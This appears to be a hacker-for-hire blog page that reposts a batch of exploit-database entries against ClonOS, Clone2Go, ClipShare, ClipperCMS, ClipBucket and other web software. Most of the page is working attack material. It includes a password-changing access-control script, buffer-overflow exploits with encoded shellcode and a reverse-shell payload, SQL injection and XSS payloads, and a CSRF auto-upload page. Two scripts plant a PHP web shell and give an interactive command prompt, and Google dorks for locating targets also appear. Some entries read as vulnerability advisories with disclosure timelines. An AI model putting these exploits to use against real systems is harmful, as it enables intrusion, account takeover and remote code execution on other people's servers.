Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138708

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
# Date: 2019-10-19
# Exploit Author: İbrahim Hakan Şeker
# Vendor Homepage: https://clonos.tekroutine.com/
# Software Link: https://github.com/clonos/control-pane
# Version: 19.09
# Tested on: ClonOs
# CVE : 2019-18418


import requests
from bs4 import BeautifulSoup
import sys

def getUser(host):
    reg=r'\"'
    r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
    r1_source = BeautifulSoup(r1.content,"lxml")
    for k in r1_source.findAll("tr"):
        for i in k.findAll("td")[0]:
            print(f"[+]User Found: {i}  User id: {k.get('id').replace(reg,'')}")
def changePassword(host,user,password,id):
    data={
        "mode":"usersEdit",
        "path":"/users/",
        "hash":"",
        "db_path":"",
        "form_data[username]":f"{user}",
        "form_data[password]":f"{password}",
        "form_data[password1]":f"{password}",
        "form_data[first_name]":"",
        "form_data[last_name]":"",
        "form_data[actuser]":"on",
        "form_data[user_id]": int(id)
        }
    r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
    if r2.status_code==200:print("[+]OK")
    else:print("[-]Fail")
if __name__=="__main__":
    if len(sys.argv)>1:
        if "getUser" in sys.argv[1]:getUser(sys.argv[2])
        elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
        else:print("Fail parameter")
    else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")
HireHackking 
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Exploit Date: 2018-09-11
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7 

# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with 
# restricted system user account without user interaction. For security demonstration 
# or to reproduce follow the provided information and steps below to continue.

# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy  the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service

#!/usr/bin/python

buffer = "\x41" * 430

poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"
HireHackking 
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------------------#
# Exploit Title      : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution)        		   #
# Exploit Author     : Gokul Babu				                                  			   						   #
# Organisation		 : Arridae Infosec P.V Ltd																		   #
# Vendor Homepage    : http://www.clone2go.com/products/videoconverter.php                                             #
# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe			                               #
# Tested on          : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change #
# Steps to reproduce :  Open the evil.txt paste the contents in Options -> Set output folder -> Browse 				   #
#----------------------------------------------------------------------------------------------------------------------#

#payload generation method
#msfpayload windows/exec CMD=calc.exe R > calc.raw
#./alpha2 eax --unicode --uppercase < calc.raw

#seh-"004d00b3"
#\x73-venetian pad(other things didn't work)
#248 bytes of padding before shellcode is required which is 124 bytes in Unicode
#EAX register is used for operation

seh= "\x41\x73" + "\xb3\x4d"
operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124

shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA")

#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw
#./alpha2 eax --unicode --uppercase < reverse.raw 
reverse=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKL9X3YM0KPKPQPTIYUNQYBQTDKR2NPTKPRLL4KQBMDTKBRMXLOVWOZMVP1KONQWP6LOLQQSLKRNLMPWQXOLMM1Y7YRL022B7TKPRLPDKOROLKQHPDKOP2XCUY044OZKQJ00PTKOXN84KPXMPKQ9CK3OLQ9TKNT4KKQZ6P1KONQ7P6LWQHOLMKQ97OHIPBUJTM3SMKHOK3MNDRUK2R84KQHNDKQZ3S64KLL0KTKR8MLKQICTKM44KKQHPDIOTO4O4QKQK1Q0YPZPQKOK0QH1O1JTKLRZKDF1MS8NSNRKPKP1XT7BSNR1O0TQXPLCGMVKWKO8UFX4PKQKPKPMY940TPPBHO9502KKPKO9EPP0P20PPOPR0OP0P1XJJLO9O9PKO8UTIXGRH6LN4LJLCQXLBM0LQQLDI9VQZLPPVPW1XTYEUT4QQKOJ5BHQSBMQTM0U9JCR7270WP1JV1ZMBPYR6YRKM1VY7PDNDOLKQM1TMOTO4LPGVKPQ4PTPPB6PVPVOVB60NPVPV0SPVRH2Y8LOO3VKO9ESYK00NR6OVKO00S8LHDGMMQPKOXUGKJPVUVBPVRH76TUWMUMKOJ5OLKVSLLJ3PKKYPT5KUWKOWMCRRRO1ZKPPSKOZ5A")

buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode))

f=open("evil.txt","w")
f.write(buf)
f.close()
HireHackking 
# # # # # 
# Exploit Title: Flippy ScriptZone – Clone Script Directory Script v1.1.0 - SQL Injection
# Google Dork: N/A
# Date: 06.02.2017
# Vendor Homepage: https://www.flippyscripts.com/
# Software Buy: https://www.flippyscripts.com/flippy-scriptzone-clone-script-directory-script/
# Demo: http://scriptzone.flippyscripts.com/
# Version: 1.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/cat.php?cid=[SQL]
# Etc...
-9999'+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin-- -
# # # # #
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 15.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Questions and Answers Script V1.1.3
# Script Buy Now: http://www.scriptfolder.com/cool-planet-clone-of-oddee/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
# Exploit Title: ClipShare v7.0 - SQL Injection
# Date: 2017-10-09
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.clip-share.com/
# Software Link: http://www.clip-share.com/
# Version: 7.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-09

Product & Service Introduction:
===============================
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.

Technical Details & Description:
================================

SQL injection on [category] URI parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN

==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: ClipperCMS 1.3.3 Persistent XSS on 'Site name' field
# Date: 05/27/2018
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: http://www.clippercms.com/
# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3
# Version: 1.3.3
# Tested on: Windows 10 x64 (XAMPP, Chrome)
# CVE: CVE-2018-11332

*Description

A persistent/stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations in ClipperCMS 1.3.3 has been discovered because it didn't sanitize user input. It allows authenticated remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors/save_settings.processor.php file.

*Proof of Concept

1. Attacker logs in as an administrator of the site.
2. Attacker visits the tools->configurations tab and enters the script below in the "Site name" field:
<script>alert('XSS')</script>
3. Once the "Save" button is clicked, the payload will execute.
4. When an unauthenticated user visits the login page "ClipperCMS/manager/", the payload will also execute.
 
*Mitigation

See https://github.com/nathunandwani/ClipperCMS/commit/f286fbfa81dc3728dbbf6d9d817c8848edcad0b2

Timeline

2018-05-21-Vulnerability reported to ClipperCMS development team
2018-05-21-CVE requested from mitre.org
2018-05-22-ClipperCMS development team acknowledges but according to them, bug is more on a trust issue rather than coding
2018-05-22-Added a potential fix in GitHub
2015-05-24-CVE published by mitre: https://twitter.com/CVEnew/status/999689171227865093
HireHackking 
# Exploit Title: ClipperCMS 1.3.3 File Upload CSRF Vulnerability
# Date: 2018-11-11
# Exploit Author: Ameer Pornillos
# Website: http://ethicalhackers.club
# Vendor Homepage: http://www.clippercms.com/
# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3
# Version: 1.3.3
# Tested on: Windows 10 x64 (XAMPP, Firefox)
# CVE : CVE-2018-19135

* Description:

ClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload
which is being used by default. This can be used by an attacker to perform
actions for an admin (or any user with file upload capability). With this
vulnerability, it can automatically upload file/s (by default it allows
aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,mp3,mp4,mpeg,mpg,ods,odp,odt,pdf,ppt,pptx,rar,tar,tgz,txt,wav,wmv,xls,xlsx,xml,z,zip
as file types). Note that web shell that can be used for remote code
execution can be achieved depending on the file types being accepted.
Uploaded file can be accessed publicly on the "/assets/files" directory
(e.g. uploaded a malicious html file with filename: poc.html file =>
http://<clipperwebsite>/clipper/assets/files/poc.html).
This can lead for the website to be host unintended file/s.

*Steps to reproduce:

Admin (or user with file upload capability) logged in ClipperCMS 1.3.3 ->
browse/open a controlled website (e.g. by link or open PoC below in a
browser where admin/user logged in to ClipperCMS 1.3.3) with the poc below
-> file is uploaded and can be accessed on http://
<clipperwebsite>/clipper/assets/files/poc.html

*Proof of Concept:

PoC below will automatically upload a "poc.html" file with simple XSS
payload. Steps above are how to make use of the PoC.

<html>
  <!-- CSRF Auto Upload File ClipperCMS PoC -->
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/clipperwebsite\/clipper\/manager\/media\/browser\/kcfinder\/browse.php?type=files&lng=en&act=upload",
true);
        xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------167248871811044278431417596280");
        xhr.withCredentials = true;
        var body =
"-----------------------------167248871811044278431417596280\r\n" +
          "Content-Disposition: form-data; name=\"upload[]\";
filename=\"poc.html\"\r\n" +
          "Content-Type: text/html\r\n" +
          "\r\n" +
          "\x3cscript\x3ealert(\'XSS\')\x3c/script\x3e\n" +
          "\r\n" +
          "-----------------------------167248871811044278431417596280\r\n"
+
          "Content-Disposition: form-data; name=\"dir\"\r\n" +
          "\r\n" +
          "files\r\n" +

"-----------------------------167248871811044278431417596280--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

*Proof of Concept Demo:

Actual video demo of the vulnerability being exploited is available on:
https://youtu.be/bEYqb99MdYs

*Reference:

https://github.com/ClipperCMS/ClipperCMS/issues/494
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    ClipperCMS 1.3.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.clippercms.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.

An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.

3. SQL Injection 1 (Blind)

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The id parameter of the web user editor is vulnerable to blind SQL Injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept


http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> true

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> false

Code


/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";

4. SQL Injection 2

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the newusername parameter is vulnerable to SQL injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept


POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Code


/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";

5. SQL Injection 3

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameter are analog to this POC for gender:


POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Visiting the overview page of that user will show the result of the injected
query.

Code


/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment',
failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil,
blockedafter=$blockedafter
WHERE internalKey=$id";

6. Solution

This issue has not been fixed by the vendor.

7. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html
HireHackking 
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"

def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})

def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)

def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})

def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)

fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)

uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")

uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")

if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")

runShell(url + "404.png?x=")


#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
HireHackking 
# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE) 
# Date: 2017-10-04
# Exploit Author: Esecurity.ir 
# Vendor Homepage: https://clipbucket.com/
# Version: 2.8.3
# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
# Usage Exploit : exploit.py http://target.com/path/



import sys,os
try:
    import requests
except Exception as e:
    print 'please install module requests!'
    sys.exit()
img = 'temp.jpg'
uploadUrl = "api/file_uploader.php"
h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'}

def getShell(url):
    try:
        r = requests.get(url+'cache/1.log',headers=h)
        if r.status_code == 200:
            return r.content
        else:
            print 'Sorry site is not vulnerable '
            sys.exit()
    except Exception as e:
        print e
        sys.exit()

def exploit(url):
    while (1):
        cmd = raw_input('$')
        if cmd == '' or cmd == 'exit':
            break
        file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')}
        data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'}
        try:
            r = requests.post(url+uploadUrl, files=file_,data=data,headers=h)
            if r.status_code == 200:
                if '"success":"yes"' in r.content:
                    print getShell(url)
                else:
                    print 'Sorry site is not vulnerable '
                    break
            else:
                print 'Sorry site is not vulnerable '
                break
        except Exception as e:
            print e
            break
if not os.path.exists(img):
    print 'please create tiny image file name is ' + img
    sys.exit()

if len(sys.argv) == 2 :
    exploit(sys.argv[1])
else:
    print "Usage Exploit : exploit.py http://target.com/path/";
HireHackking 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > ClipBucket 2.8.3 - Multiple Vulnerabilities

.:. Google Dorks .:.
"Forged by ClipBucket"
inurl:view_collection.php?cid=

.:. Date: August 15, 2017

.:. Exploit Author: bRpsd
.:. Skype contact: vegnox
.:. Mail contact: cy@live.no

.:. Vendor Homepage > https://clipbucket.com/latest
.:. Software Link > https://github.com/arslancb/clipbucket/archive/4829.zip
.:. Version: 2.8.3 latest!
.:. Tested on > Linux, on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Vulnerability 1: Blind SQL Injection

Type: boolean
File: /view_collection.php
Parameter: cid


.:. POC .:.

http://localhost/view_collection.php?cid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--&type=photos [columns count]
http://localhost/view_collection.php?cid=1 AND 1=1&type=photos [true]
http://localhost/view_collection.php?cid=1 AND 1=2&type=photos [false]





Vulnerability 2: Arbitrary File Read/Write

NOTE: Access Requires Admin Privilege!

File: /admin_area/template_editor.php
Parameter: file

.:. POC .:.

The template editor is suppose to allow editing html/css files only, but if you modify the file parameter you can escape the template directory then view OR edit any file actually of any extension.

http://localhost/admin_area/template_editor.php?dir=cb_28&file=../../../index.php&folder=layout





Vulnerability 3: Default & Weak admin password

When you setup the CMS, the admin password is autocomplete set as [admin] unless you change it, lazy people will skip changing that field and end up having username and password as 'admin' which is pretty easy to guess!






-Be safe.
HireHackking 
# Exploit Title: ClipBucket 2.8 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://clipbucket.com/
# Software Link: https://sourceforge.net/projects/clipbucket/files/latest/download
# Version: 2.8.v3354
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/ajax.php
 
POST /[PATH]/ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
mode=rating&id=(CASE%20WHEN%20(112=112)%20THEN%20SLEEP(5)%20ELSE%20112%20END)&rating=5&type=user
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 20:22:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 828
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title   : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
# Date            : 20 February 2015
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://clip-bucket.com/
# Software Link   : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
# Version         : 2.7.0.4.v2929-rc3
# Tested on       : Window and Linux
   
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /       
  / XXXXXX /
 (________(         
  `------'
  
####################
SOFTWARE DESCRIPTION
####################
  
ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all
the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any
other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable &
scalable media distribution platform with latest social networking features, while staying light on your pockets.
Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.
  
##################################
VULNERABILITY: Blind SQL Injection
##################################
   
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
  
= POC =
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9	=> True Condition
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9	=> False Condition (Item does not exist.)
   
################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
      
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
      
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
      
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
     
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
     
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
     
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
       
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
       
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
       
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
    
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
    
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
